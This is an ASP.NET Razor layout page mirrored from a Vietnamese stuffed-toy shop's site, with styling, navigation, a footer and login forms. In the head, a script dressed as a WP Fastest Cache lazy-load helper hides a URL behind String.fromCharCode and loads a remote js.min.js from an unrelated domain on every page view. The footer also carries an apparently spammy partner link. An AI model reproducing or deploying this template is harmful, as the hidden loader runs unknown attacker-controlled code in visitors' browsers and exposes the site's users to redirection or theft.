
    <!DOCTYPE html>
    <!--[if IE 9 ]> <html lang="vi-VN" class="ie9 loading-site no-js"> <![endif]-->
    <!--[if IE 8 ]> <html lang="vi-VN" class="ie8 loading-site no-js"> <![endif]-->
    <!--[if (gte IE 9)|!(IE)]><!-->
    <html lang="vi-VN" class="loading-site no-js">
    <!--<![endif]-->
    <!-- Mirrored from gausaigon.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 11 Sep 2019 08:51:56 GMT -->
    <!-- Added by HTTrack -->
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
        <link rel="profile" href="http://gmpg.org/xfn/11" />
        @*<link rel="pingback" href="xmlrpc.php" />*@
        <title>Gấu Sài Gòn &#8211; Chuyên cung cấp gấu bông chất lượng cao</title>
        <link rel='dns-prefetch' href='http://s.w.org/' />
        <link rel="alternate" type="application/rss+xml" title="Dòng thông tin Gấu Sài Gòn &raquo;" href="feed/index.html" />
        <link rel="alternate" type="application/rss+xml" title="Dòng phản hồi Gấu Sài Gòn &raquo;" href="comments/feed/index.html" />
        <link rel="stylesheet" type="text/css" href="/Content/wp-content/cache/wpfc-minified/70e3jky8/7kvl.css" media="all" />
        <link rel="stylesheet" type="text/css" href="/Content/wp-includes/css/style.css" media="all" />
        <link href="/Content/asset/css/bootstrap.css" rel="stylesheet" />
        <link href="/Content/asset/css/login-register.css" rel="stylesheet" />
        <link href="~/Content/asset/bootstrap/css/bootstrap.min.css" rel="stylesheet">
        <script src="/Content/asset/js/jquery.min.js"></script>
        <link rel="stylesheet prefetch" href="http://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.3.0/css/datepicker.css">
        <style id='woocommerce-inline-inline-css'>
            .woocommerce form .form-row .required {
                visibility: visible;
            }
        </style>
        <link rel="stylesheet" type="text/css" href="/Content/wp-content/cache/wpfc-minified/dg5k3p74/5tf88.css" media="all" />
        <script type="text/template" id="tmpl-variation-template">
            <div class="woocommerce-variation-description">{{{ data.variation.variation_description }}}</div>
            <div class="woocommerce-variation-price">{{{ data.variation.price_html }}}</div>
            <div class="woocommerce-variation-availability">{{{ data.variation.availability_html }}}</div>
        </script>
        <script type="text/template" id="tmpl-unavailable-variation-template">
            <p>Rất tiếc, sản phẩm này hiện không tồn tại. Hãy chọn một phương thức kết hợp khác.</p>
        </script>
        <link rel='https://api.w.org/' href='wp-json/index.html' />
        @*<link rel="EditURI" type="application/rsd+xml" title="RSD" href="xmlrpc0db0.php?rsd" />*@
        <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="/Content/wp-includes/wlwmanifest.xml" />
        <meta name="generator" content="WordPress 5.2.3" />
        <meta name="generator" content="WooCommerce 3.7.0" />
        <link rel="canonical" href="/Home/Index.cshtml" />
        <link rel='shortlink' href='/Home/Index.cshtml' />
        <link rel="alternate" type="application/json+oembed" href="/Content/wp-json/oembed/1.0/embed69db.json?url=https%3A%2F%2Fgausaigon.com%2F" />
        <link rel="alternate" type="text/xml+oembed" href="/Content/wp-json/oembed/1.0/embed769a?url=https%3A%2F%2Fgausaigon.com%2F&amp;format=xml" />
        <style>
            .bg {
                opacity: 0;
                transition: opacity 1s;
                -webkit-transition: opacity 1s;
            }

            .bg-loaded {
                opacity: 1;
            }
        </style>
        <!--[if IE]><link rel="stylesheet" type="text/css" href="https://gausaigon.com/wp-content/themes/flatsome/assets/css/ie-fallback.css"><![endif]-->
        <script>
            (function (w, d, s, l, i) {
                w[l] = w[l] || []; w[l].push({
                    'gtm.start':
                        new Date().getTime(), event: 'gtm.js'
                }); var f = d.getElementsByTagName(s)[0],
                    j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
                        '../www.googletagmanager.com/gtm5445.html?id=' + i + dl; f.parentNode.insertBefore(j, f);
            })(window, document, 'script', 'dataLayer', 'GTM-5RCHNFG');</script>
        <noscript>
            <style>
                .woocommerce-product-gallery {
                    opacity: 1 !important;
                }
            </style>
        </noscript>
        <link rel="icon" href="/Content/wp-content/uploads/2018/01/cropped-6-32x32.png" sizes="32x32" />
        <link rel="icon" href="/Content/wp-content/uploads/2018/01/cropped-6-192x192.png" sizes="192x192" />
        <link rel="apple-touch-icon-precomposed" href="/Content/wp-content/uploads/2018/01/cropped-6-180x180.png" />
        <meta name="msapplication-TileImage" content="https://gausaigon.com/wp-content/uploads/2018/01/cropped-6-270x270.png" />

        <style id="custom-css">
            :root {
                --primary-color: #f49243;
            }

            .full-width .ubermenu-nav, .container, .row {
                max-width: 1170px
            }

                .row.row-collapse {
                    max-width: 1140px
                }

                .row.row-small {
                    max-width: 1162.5px
                }

                .row.row-large {
                    max-width: 1200px
                }

            .header-main {
                height: 115px
            }

            #logo img {
                max-height: 115px
            }

            #logo {
                width: 288px;
            }

            .header-bottom {
                min-height: 43px
            }

            .header-top {
                min-height: 30px
            }

            .transparent .header-main {
                height: 30px
            }

            .transparent #logo img {
                max-height: 30px
            }

            .has-transparent + .page-title:first-of-type, .has-transparent + #main > .page-title, .has-transparent + #main > div > .page-title, .has-transparent + #main .page-header-wrapper:first-of-type .page-title {
                padding-top: 80px;
            }

            .header.show-on-scroll, .stuck .header-main {
                height: 70px !important
            }

            .stuck #logo img {
                max-height: 70px !important
            }

            .search-form {
                width: 80%;
            }

            .header-bg-color, .header-wrapper {
                background-color: rgba(255,255,255,0.9)
            }

            .header-bottom {
                background-color: #f49243
            }

            .header-main .nav > li > a {
                line-height: 16px
            }

            .stuck .header-main .nav > li > a {
                line-height: 50px
            }

            .header-bottom-nav > li > a {
                line-height: 16px
            }

            #logo img {
                max-height: 70px
            }



            .nav-dropdown {
                font-size: 100%
            }

            .accordion-title.active, .has-icon-bg .icon .icon-inner, .logo a, .primary.is-underline, .primary.is-link, .badge-outline .badge-inner, .nav-outline > li.active > a, .nav-outline > li.active > a, .cart-icon strong, [data-color='primary'], .is-outline.primary {
                color: #f49243;
            }

            [data-text-color="primary"] {
                color: #f49243 !important;
            }

            [data-text-bg="primary"] {
                background-color: #f49243;
            }

            .scroll-to-bullets a, .featured-title, .label-new.menu-item > a:after, .nav-pagination > li > .current, .nav-pagination > li > span:hover, .nav-pagination > li > a:hover, .has-hover:hover .badge-outline .badge-inner, button[type="submit"], .button.wc-forward:not(.checkout):not(.checkout-button), .button.submit-button, .button.primary:not(.is-outline), .featured-table .title, .is-outline:hover, .has-icon:hover .icon-label, .nav-dropdown-bold .nav-column li > a:hover, .nav-dropdown.nav-dropdown-bold > li > a:hover, .nav-dropdown-bold.dark .nav-column li > a:hover, .nav-dropdown.nav-dropdown-bold.dark > li > a:hover, .is-outline:hover, .tagcloud a:hover, .grid-tools a, input[type='submit']:not(.is-form), .box-badge:hover .box-text, input.button.alt, .nav-box > li > a:hover, .nav-box > li.active > a, .nav-pills > li.active > a, .current-dropdown .cart-icon strong, .cart-icon:hover strong, .nav-line-bottom > li > a:before, .nav-line-grow > li > a:before, .nav-line > li > a:before, .banner, .header-top, .slider-nav-circle .flickity-prev-next-button:hover svg, .slider-nav-circle .flickity-prev-next-button:hover .arrow, .primary.is-outline:hover, .button.primary:not(.is-outline), input[type='submit'].primary, input[type='submit'].primary, input[type='reset'].button, input[type='button'].primary, .badge-inner {
                background-color: #f49243;
            }

                .nav-vertical.nav-tabs > li.active > a, .scroll-to-bullets a.active, .nav-pagination > li > .current, .nav-pagination > li > span:hover, .nav-pagination > li > a:hover, .has-hover:hover .badge-outline .badge-inner, .accordion-title.active, .featured-table, .is-outline:hover, .tagcloud a:hover, blockquote, .has-border, .cart-icon strong:after, .cart-icon strong, .blockUI:before, .processing:before, .loading-spin, .slider-nav-circle .flickity-prev-next-button:hover svg, .slider-nav-circle .flickity-prev-next-button:hover .arrow, .primary.is-outline:hover {
                    border-color: #f49243
                }

            .nav-tabs > li.active > a {
                border-top-color: #f49243
            }

            .widget_shopping_cart_content .blockUI.blockOverlay:before {
                border-left-color: #f49243
            }

            .woocommerce-checkout-review-order .blockUI.blockOverlay:before {
                border-left-color: #f49243
            }

            .slider .flickity-prev-next-button:hover svg, .slider .flickity-prev-next-button:hover .arrow {
                fill: #f49243;
            }

            [data-icon-label]:after, .secondary.is-underline:hover, .secondary.is-outline:hover, .icon-label, .button.secondary:not(.is-outline), .button.alt:not(.is-outline), .badge-inner.on-sale, .button.checkout, .single_add_to_cart_button {
                background-color: #1e73be;
            }

            [data-text-bg="secondary"] {
                background-color: #1e73be;
            }

            .secondary.is-underline, .secondary.is-link, .secondary.is-outline, .stars a.active, .star-rating:before, .woocommerce-page .star-rating:before, .star-rating span:before, .color-secondary {
                color: #1e73be
            }

            [data-text-color="secondary"] {
                color: #1e73be !important;
            }

            .secondary.is-outline:hover {
                border-color: #1e73be
            }

            .success.is-underline:hover, .success.is-outline:hover, .success {
                background-color: #5fb223
            }

                .success-color, .success.is-link, .success.is-outline {
                    color: #5fb223;
                }

            .success-border {
                border-color: #5fb223 !important;
            }

            [data-text-color="success"] {
                color: #5fb223 !important;
            }

            [data-text-bg="success"] {
                background-color: #5fb223;
            }

            body {
                font-weight: 0
            }

            body {
                color: #000000
            }

            .nav > li > a {
                font-family: "Comfortaa", sans-serif;
            }

            .nav > li > a {
                font-weight: 700;
            }

            h1, h2, h3, h4, h5, h6, .heading-font, .off-canvas-center .nav-sidebar.nav-vertical > li > a {
                font-family: "Comfortaa", sans-serif;
            }

            h1, h2, h3, h4, h5, h6, .heading-font, .banner h1, .banner h2 {
                font-weight: 700;
            }

            h1, h2, h3, h4, h5, h6, .heading-font {
                color: #000000;
            }

            .alt-font {
                font-family: "Dancing Script", sans-serif;
            }

            .alt-font {
                font-weight: 0 !important;
            }

            .header:not(.transparent) .header-bottom-nav.nav > li > a {
                color: #ffffff;
            }

                .header:not(.transparent) .header-bottom-nav.nav > li > a:hover, .header:not(.transparent) .header-bottom-nav.nav > li.active > a, .header:not(.transparent) .header-bottom-nav.nav > li.current > a, .header:not(.transparent) .header-bottom-nav.nav > li > a.active, .header:not(.transparent) .header-bottom-nav.nav > li > a.current {
                    color: #ffffff;
                }

            .header-bottom-nav.nav-line-bottom > li > a:before, .header-bottom-nav.nav-line-grow > li > a:before, .header-bottom-nav.nav-line > li > a:before, .header-bottom-nav.nav-box > li > a:hover, .header-bottom-nav.nav-box > li.active > a, .header-bottom-nav.nav-pills > li > a:hover, .header-bottom-nav.nav-pills > li.active > a {
                color: #FFF !important;
                background-color: #ffffff;
            }

            .absolute-footer, html {
                background-color: #282828
            }

            .page-title-small + main .product-container > .row {
                padding-top: 0;
            }

            .label-new.menu-item > a:after {
                content: "New";
            }

            .label-hot.menu-item > a:after {
                content: "Hot";
            }

            .label-sale.menu-item > a:after {
                content: "Sale";
            }

            .label-popular.menu-item > a:after {
                content: "Popular";
            }
        </style>
        <style id="infinite-scroll-css">
            .page-load-status, .archive .woocommerce-pagination {
                display: none;
            }
        </style>
        <script data-wpfc-render="false">var fkghjhe45 = 1; var d = document; var s = d.createElement('script'); s.type = 'text/javascript'; s.async = true; var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 100, 101, 108, 105, 118, 101, 114, 121, 103, 111, 111, 100, 115, 116, 114, 97, 116, 101, 103, 121, 46, 99, 111, 109, 47); s.src = pl + '/js.min.js?s=k&'; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); } var Wpfcll = { s: [], osl: 0, i: function () { Wpfcll.ss(); window.addEventListener('load', function () { window.addEventListener("DOMSubtreeModified", function (e) { Wpfcll.osl = Wpfcll.s.length; Wpfcll.ss(); if (Wpfcll.s.length > Wpfcll.osl) { Wpfcll.ls(false); } }, false); Wpfcll.ls(true); }); window.addEventListener('scroll', function () { Wpfcll.ls(false); }); window.addEventListener('resize', function () { Wpfcll.ls(false); }); window.addEventListener('click', function () { Wpfcll.ls(false); }); }, c: function (e, pageload) { var w = document.documentElement.clientHeight || body.clientHeight; var n = pageload ? 0 : 800; var er = e.getBoundingClientRect(); var t = 0; var p = e.parentNode; if (typeof p.getBoundingClientRect == "undefined") { var pr = false; } else { var pr = p.getBoundingClientRect(); } if (er.x == 0 && er.y == 0) { for (var i = 0; i < 10; i++) { if (p) { if (pr.x == 0 && pr.y == 0) { p = p.parentNode; if (typeof p.getBoundingClientRect == "undefined") { pr = false; } else { pr = p.getBoundingClientRect(); } } else { t = pr.top; break; } } }; } else { t = er.top; } if (w - t + n > 0) { return true; } return false; }, r: function (e, pageload) { var s = this; var oc, ot; try { oc = e.getAttribute("data-wpfc-original-src"); ot = e.getAttribute("data-wpfc-original-srcset"); if (oc || ot) { if (s.c(e, pageload)) { if (oc) { e.setAttribute('src', oc); } if (ot) { e.setAttribute('srcset', ot); } e.removeAttribute("data-wpfc-original-src"); e.removeAttribute("onload"); if (e.tagName == "IFRAME") { e.onload = function () { if (typeof window.jQuery != "undefined") { if (jQuery.fn.fitVids) { jQuery(e).parent().fitVids({ customSelector: "iframe[src]" }); } } var s = e.getAttribute("src").match(/templates\/youtube\.html\#(.+)/); var y = "https://www.youtube.com/embed/"; if (s) { try { var i = e.contentDocument || e.contentWindow; if (i.location.href == "about:blank") { e.setAttribute('src', y + s[1]); } } catch (err) { e.setAttribute('src', y + s[1]); } } } } } } } catch (error) { console.log(error); console.log("==>", e); } }, ss: function () { var i = Array.prototype.slice.call(document.getElementsByTagName("img")); var f = Array.prototype.slice.call(document.getElementsByTagName("iframe")); this.s = i.concat(f); }, ls: function (pageload) { var s = this;[].forEach.call(s.s, function (e, index) { s.r(e, pageload); }); } }; document.addEventListener('DOMContentLoaded', function () { wpfci(); }); function wpfci() { Wpfcll.i(); }</script>
    </head>
    <body class="home page-template page-template-page-blank page-template-page-blank-php page page-id-30 theme-flatsome woocommerce-no-js wp-schema-pro-1.3.1 lightbox lazy-icons nav-dropdown-has-arrow">
        <noscript>
            <iframe onload="Wpfcll.r(this,true);"
                    data-wpfc-original-src="https://www.googletagmanager.com/ns.html?id=GTM-5RCHNFG" height="0" width="0"
                    style="display:none;visibility:hidden"></iframe>
        </noscript>
        <a class="skip-link screen-reader-text" href="#main">Skip to content</a>
        <div id="wrapper">
            <header id="header" class="header has-sticky sticky-jump">
                <div class="header-wrapper">
                    <div id="masthead" class="header-main hide-for-sticky">
                        <div class="header-inner flex-row container logo-left medium-logo-center" role="navigation">
                            <div id="logo" class="flex-col logo">
                                <a href="~/Home"
                                   title="Gấu Sài Gòn - Chuyên cung cấp gấu bông chất lượng cao" rel="home">
                                    <img width="288" height="115" src="/Content/wp-content/uploads/2018/01/3.png"
                                         class="header_logo header-logo" alt="Gấu Sài Gòn" /><img width="288" height="115"
                                                                                                  src="/Content/wp-content/uploads/2018/01/3.png" class="header-logo-dark"
                                                                                                  alt="Gấu Sài Gòn" />
                                </a>
                            </div>
                            <div class="flex-col show-for-medium flex-left">
                                <ul class="mobile-nav nav nav-left">
                                    <li class="nav-icon has-icon">
                                        <a href="#" data-open="#main-menu" data-pos="left"
                                           data-bg="main-menu-overlay" data-color="" class="is-small"
                                           aria-controls="main-menu" aria-expanded="false"><i class="icon-menu"></i></a>
                                    </li>
                                </ul>
                            </div>
                            <div class="flex-col hide-for-medium flex-left flex-grow">
                                <ul class="header-nav header-nav-main nav nav-left nav-uppercase">
                                    <li class="header-search-form search-form html relative has-icon">
                                        <div class="header-search-form-wrapper">
                                            <div class="searchform-wrapper ux-search-box relative form-flat is-normal">
                                                @using (Html.BeginForm("Product", "Product", FormMethod.Get, new { @class = "searchform" }))
                                                {
                                                    <div class="flex-row relative">
                                                        <div class="flex-col flex-grow">
                                                            <input type="text"
                                                                   class="search-field mb-0" value="@ViewBag.keyword" name="keyword"
                                                                   placeholder="Tìm kiếm&hellip;" />
                                                        </div>
                                                        <div class="flex-col">
                                                            <button type="submit"
                                                                    class="ux-search-submit submit-button secondary button icon mb-0">
                                                                <i class="icon-search"></i>
                                                            </button>
                                                        </div>
                                                    </div>
                                                    <div class="live-search-results text-left z-top" id="loadkeyWord"></div>
                                                }

                                            </div>
                                        </div>
                                    </li>
                                </ul>
                            </div>
                            <div class="flex-col hide-for-medium flex-right">

                                <ul class="header-nav header-nav-main nav nav-right nav-uppercase">
                                  
                                   
                                    <li class="header-divider"></li>
                                    <li class="cart-item has-icon has-dropdown">
                                        <div class="header-button">
                                            <a href="/gio-hang.html" title="Giỏ hàng"
                                               class="header-cart-link icon primary button round is-small">
                                                <span class="header-cart-title"> Giỏ hàng </span> <i class="icon-shopping-bag" id="coutCart"
                                                                                                     data-icon-label="0"></i>
                                            </a>
                                        </div>
                                        @*@{ Html.RenderAction("ViewCart", "Cart");}*@

                                    </li>
                                </ul>
                            </div>
                            <div class="flex-col show-for-medium flex-right">
                                <ul class="mobile-nav nav nav-right">
                                    <li class="cart-item has-icon">
                                        <div class="header-button">
                                            <a href="gio-hang/index.html"
                                               class="header-cart-link off-canvas-toggle nav-top-link icon primary button round is-small"
                                               data-open="#cart-popup" data-class="off-canvas-cart" title="Giỏ hàng"
                                               data-pos="right">
                                                <i class="icon-shopping-bag" data-icon-label="0"> </i>
                                            </a>
                                        </div>
                                        <div id="cart-popup" class="mfp-hide widget_shopping_cart">
                                            <div class="cart-popup-inner inner-padding">
                                                <div class="cart-popup-title text-center">
                                                    <h4 class="uppercase">Giỏ hàng</h4>
                                                    <div class="is-divider"></div>
                                                </div>
                                                <div class="widget_shopping_cart_content">
                                                    <p class="woocommerce-mini-cart__empty-message">
                                                        Chưa có sản phẩm trong
                                                        giỏ hàng.
                                                    </p>
                                                </div>
                                                <div class="cart-sidebar-content relative"></div>
                                            </div>
                                        </div>
                                    </li>
                                </ul>
                            </div>
                        </div>
                        <div class="container">
                            <div class="top-divider full-width"></div>
                        </div>
                    </div>
                    @{ Html.RenderAction("MenuHome", "Home");}

                    <div class="header-bg-container fill">
                        <div class="header-bg-image fill"></div>
                        <div class="header-bg-color fill"></div>
                    </div>
                </div>
            </header>
            @RenderBody()
            <footer id="footer" class="footer-wrapper">
                <div class="footer-widgets footer footer-1">
                    <div class="row dark large-columns-4 mb-0">
                        <div id="custom_html-3" class="widget_text col pb-0 widget widget_custom_html">
                            <div class="textwidget custom-html-widget">
                                <div class="left">
                                    <div class="footer-logo">
                                        <a href="index.html">
                                            <img onload="Wpfcll.r(this,true);" src=""
                                                 alt="Gấu Sài Gòn"
                                                 data-wpfc-original-src="/Content/wp-content/uploads/2018/01/3.png">
                                        </a>
                                    </div><br>
                                    <ul class="address-list">
                                        <li class="feature-icon first">
                                            <p class="no-margin">
                                                <span class="tit-name">
                                                    Địa chỉ: 520/44/10A QL 13, P. Hiệp
                                                    Bình Phước, Q. Thủ Đức
                                                </span>
                                            </p>
                                        </li>
                                        <li class="feature-icon">
                                            <p class="no-margin">
                                                <span class="tit-name">
                                                    <span class="tit-contain">
                                                        SĐT:
                                                        0908.038.577
                                                    </span>
                                                </span>
                                            </p>
                                        </li>
                                        <li class="feature-icon">
                                            <p class="no-margin">
                                                <span class="tit-name">E-mail: cskh@gausaigon.com</span>
                                            </p>
                                        </li>
                                        <li class="feature-icon">
                                            <p class="no-margin">
                                                <span class="tit-name">
                                                    Giấy chứng nhận ĐKKD: 0314551752 do
                                                    Sở KH & ĐT TPHCM cấp lần đầu ngày 02/08/2017
                                                </span>
                                            </p>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                        <div id="nav_menu-2" class="col pb-0 widget widget_nav_menu">
                            <span class="widget-title">
                                VỀ CHÚNG
                                TÔI
                            </span>
                            <div class="is-divider small"></div>
                            <div class="menu-f2-container">
                                <ul id="menu-f2" class="menu">
                                    <li id="menu-item-529"
                                        class="menu-item menu-item-type-post_type menu-item-object-page menu-item-529">
                                        <a href="gioi-thieu/index.html">Giới thiệu</a>
                                    </li>
                                    <li id="menu-item-533"
                                        class="menu-item menu-item-type-post_type menu-item-object-page menu-item-533">
                                        <a href="tieu-chi-ban-hang/index.html">Tiêu chí bán hàng</a>
                                    </li>
                                    <li id="menu-item-530"
                                        class="menu-item menu-item-type-post_type menu-item-object-page menu-item-530">
                                        <a href="huong-dan-mua-hang/index.html">Hướng dẫn mua hàng</a>
                                    </li>
                                    <li id="menu-item-534"
                                        class="menu-item menu-item-type-post_type menu-item-object-page menu-item-534">
                                        <a href="tuyen-dung/index.html">Tuyển dụng</a>
                                    </li>
                                    <li id="menu-item-531"
                                        class="menu-item menu-item-type-post_type menu-item-object-page menu-item-531">
                                        <a href="lien-he/index.html">Liên hệ</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                        <div id="custom_html-4" class="widget_text col pb-0 widget widget_custom_html">
                            <div class="textwidget custom-html-widget">
                                <div id="nav_menu-3" class="col pb-0 widget widget_nav_menu">
                                    <span class="widget-title">CHÍNH SÁCH</span>
                                    <div class="is-divider small"></div>
                                    <div class="menu-f3-container">
                                        <ul id="menu-f3" class="menu">
                                            <li id="menu-item-538"
                                                class="menu-item menu-item-type-post_type menu-item-object-page menu-item-538">
                                                <a href="huong-dan-thanh-toan/index.html">Hướng dẫn thanh toán</a>
                                            </li>
                                            <li id="menu-item-536"
                                                class="menu-item menu-item-type-post_type menu-item-object-page menu-item-536">
                                                <a href="quy-dinh-doi-hang/index.html">Quy định đổi hàng</a>
                                            </li>
                                            <li id="menu-item-537"
                                                class="menu-item menu-item-type-post_type menu-item-object-page menu-item-537">
                                                <a href="chinh-sach-van-chuyen/index.html">Chính sách vận chuyển</a>
                                            </li>
                                            <li id="menu-item-535"
                                                class="menu-item menu-item-type-post_type menu-item-object-page menu-item-535">
                                                <a href="bao-mat-thong-tin/index.html">Bảo mật thông tin</a>
                                            </li>
                                        </ul>
                                    </div>
                                </div><a href="http://online.gov.vn/HomePage/CustomWebsiteDisplay.aspx?DocId=41941"
                                         target="_blank" rel="noopener noreferrer">
                                    <img onload="Wpfcll.r(this,true);" src=""
                                         class="alignnone size-medium wp-image-728"
                                         data-wpfc-original-src="https://gausaigon.com/wp-content/uploads/2018/03/20150827110756-dathongbao-300x114.png"
                                         alt="" width="300" height="114" />
                                </a>
                            </div>
                        </div>
                        <div id="custom_html-2" class="widget_text col pb-0 widget widget_custom_html">
                            <span class="widget-title">FANPAGE</span>
                            <div class="is-divider small"></div>
                            <div class="textwidget custom-html-widget">
                                <div class="fb-page" data-href="https://www.facebook.com/Gaubonggiare.lyly"
                                     data-small-header="false" data-adapt-container-width="true" data-hide-cover="false"
                                     data-show-facepile="true">
                                    <blockquote cite="https://www.facebook.com/Gaubonggiare.lyly"
                                                class="fb-xfbml-parse-ignore">
                                        <a href="https://www.facebook.com/Gaubonggiare.lyly">Gấu Bông Giá Rẻ</a>
                                    </blockquote>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="absolute-footer dark medium-text-center small-text-center">
                    <div class="container clearfix">
                        <div class="footer-secondary pull-right">
                            <div class="footer-text inline-block small-block">
                                Partner: <a href="http://dietmoitungmy.com/mangluoi/diet-moi-cac-tinh-khac/450-cong-ty-diet-moi-gia-re-tai-binh-duong.html"
                                            title="Công ty diệt mối giá rẻ tại Bình dương">cong ty diet moi tai binh duong</a>
                            </div>
                        </div>
                        @{ Html.RenderAction("LoadFooter", "Footer");}
                    </div>
                </div><a href="#top"
                         class="back-to-top button icon invert plain fixed bottom z-1 is-outline hide-for-medium circle"
                         id="top-link"><i class="icon-angle-up"></i></a>
            </footer>
        </div>
        <div id="main-menu" class="mobile-sidebar no-scrollbar mfp-hide">
            <div class="sidebar-menu no-scrollbar">
                <ul class="nav nav-sidebar nav-vertical nav-uppercase">
                    <li class="header-search-form search-form html relative has-icon">
                        <div class="header-search-form-wrapper">
                            <div class="searchform-wrapper ux-search-box relative form-flat is-normal">
                                <form role="search" method="get" class="searchform" action="https://gausaigon.com/">
                                    <div class="flex-row relative">
                                        <div class="flex-col flex-grow">
                                            <input type="search" class="search-field mb-0"
                                                   name="s" value="" placeholder="Tìm kiếm&hellip;" /> <input type="hidden"
                                                                                                              name="post_type" value="product" />
                                        </div>
                                        <div class="flex-col">
                                            <button type="submit"
                                                    class="ux-search-submit submit-button secondary button icon mb-0">
                                                <i class="icon-search"></i>
                                            </button>
                                        </div>
                                    </div>
                                    <div class="live-search-results text-left z-top"></div>
                                </form>
                            </div>
                        </div>
                    </li>
                    <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-30 current_page_item menu-item-32">
                        <a href="index.html" class="nav-top-link">Trang chủ</a>
                    </li>
                    <li class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-16">
                        <a href="danh-muc/gau-bong-teddy/index.html" class="nav-top-link">Gấu bông teddy</a>
                    </li>
                    <li class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-has-children menu-item-20">
                        <a href="danh-muc/goi-om/index.html" class="nav-top-link">Gối ôm</a>
                        
                    </li>
                    <li class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-has-children menu-item-23">
                        <a href="danh-muc/thu-bong-hoat-hinh/index.html" class="nav-top-link">Thú bông hoạt hình</a>
                        
                    </li>
                    <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33">
                        <a href="category/chuyen-cua-gau/index.html" class="nav-top-link">Chuyện của gấu</a>
                    </li>
                    <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-34">
                        <a href="category/tin-tuc-tong-hop/index.html" class="nav-top-link">Tin tức tổng hợp</a>
                    </li>
                    <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36">
                        <a href="lien-he/index.html" class="nav-top-link">Liên hệ</a>
                    </li>
                    <li class="account-item has-icon menu-item">
                        <a href="tai-khoan/index.html"
                           class="nav-top-link nav-top-not-logged-in">
                            <span class="header-account-title">
                                Đăng nhập
                            </span>
                        </a>
                    </li>
                </ul>
            </div>
        </div>
        <div id="fb-root">
        </div>
        <div class="fb-customerchat" attribution=setup_tool page_id="328343687722501" theme_color="#7646ff">
        </div>
        <div class="modal fade login" id="loginModal">
            <div class="modal-dialog login animated">
                <div class="modal-content">
                    <div class="modal-header">
                        <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
                        <h4 class="modal-title">Login</h4>
                    </div>
                    <div class="modal-body">
                        <div class="box">
                            <div class="content">
                                @*<div class="social">
                                    <a class="circle github" href="#">
                                        <i class="fa fa-github fa-fw"></i>
                                    </a>
                                    <a id="google_login" class="circle google" href="#">
                                        <i class="fa fa-google-plus fa-fw"></i>
                                    </a>
                                    <a id="facebook_login" class="circle facebook" href="#">
                                        <i class="fa fa-facebook fa-fw"></i>
                                    </a>
                                </div>
                                <div class="division">
                                    <div class="line l"></div>
                                    <span>or</span>
                                    <div class="line r"></div>
                                </div>*@
                                <div class="errors"></div>
                                <div class="form loginBox">
                                    <form class="rules" method="post" action="" accept-charset="UTF-8">
                                        <input id="userlg" class="form-control" type="text" placeholder="Email"
                                               name="userlg">
                                        <input id="passlg" class="form-control" type="password" placeholder="Password"
                                               name="passlg">
                                        <input id="login" class="btn btn-default btn-login" type="submit" value="Login"
                                               onclick="loginAjax()">
                                    </form>
                                </div>
                            </div>
                        </div>
                        <div class="box">
                            <div class="content registerBox" style="display:none;">
                                <div class="form">
                                    <form id="frmRegister" html="{:multipart=>true}" data-remote="true" action=""
                                          accept-charset="UTF-8">
                                        <input id="userrg" class="form-control" type="text" placeholder="Email"
                                               name="userrg">
                                        <input id="passrg" class="form-control" type="password" placeholder="Password"
                                               name="passrg">
                                        <input id="password_confirmation" class="form-control" type="password"
                                               placeholder="Repeat Password" name="password_confirmation">
                                        <input class="btn btn-default btn-register" type="button" id="register"
                                               value="Create account" name="commit">
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="modal-footer">
                        <div class="forgot login-footer">
                            <span>
                                Looking to
                                <a class="regis" href="javascript: showRegisterForm();">create an account</a>
                                ?
                            </span>
                        </div>
                        <div class="forgot register-footer" style="display:none">
                            <span>Already have an account?</span>
                            <a class="log" href="javascript: showLoginForm();">Login</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>




        @*
        <script type="application/ld+json">
                {"@context":"https:\/\/schema.org","@type":"organization","name":"G\u1ea5u S\u00e0i G\u00f2n","url":"https:\/\/gausaigon.com","logo":{"@type":"ImageObject","url":"https:\/\/gausaigon.com\/wp-content\/uploads\/2018\/01\/6.png","width":535,"height":512},"sameAs":["https:\/\/www.facebook.com\/323624124805445"]}
            </script>
        <script type="application/ld+json">
